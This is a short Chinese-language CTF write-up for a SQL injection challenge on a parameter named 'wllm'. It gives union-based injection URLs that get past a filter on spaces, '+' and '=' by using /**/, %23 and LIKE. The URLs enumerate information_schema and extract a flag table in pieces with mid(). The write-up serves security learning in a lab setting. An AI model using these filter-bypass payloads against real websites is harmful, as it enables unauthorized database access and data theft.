依然是杰哥(
参数是wllm,此次有黑名单(Waf),而且经过了测试,过滤了空格,+和=
绕过方法为/**/,%23,like
?wllm=-1'/**/order/**/by/**/4%23
判断列数
?wllm=-1'/**/union/**/select/**/1,2,3%23
判断显示位
?wllm=-1'/**/union/**/select/**/1,database(),group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23
显示当前数据库和当前数据库的表
?wllm=-1'/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23
显示这个表内的字段名
?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23
显示这个字段的内容(我依然显示的是database(),不必在意)
显示不全怎么办呢,利用mid函数
mid(字符串,开始的位数,读取个数)
?wllm=-1'/**/union/**/select/**/1,database(),mid(group_concat(flag),1,20)/**/from/**/LTLT_flag%23
第一段和上面显示的内容一样
?wllm=-1'/**/union/**/select/**/1,database(),mid(group_concat(flag),20,20)/**/from/**/LTLT_flag%23
第二段显示新东西
?wllm=-1'/**/union/**/select/**/1,database(),mid(group_concat(flag),40,20)/**/from/**/LTLT_flag%23
第三段是末尾
将三段拼接起来就可以了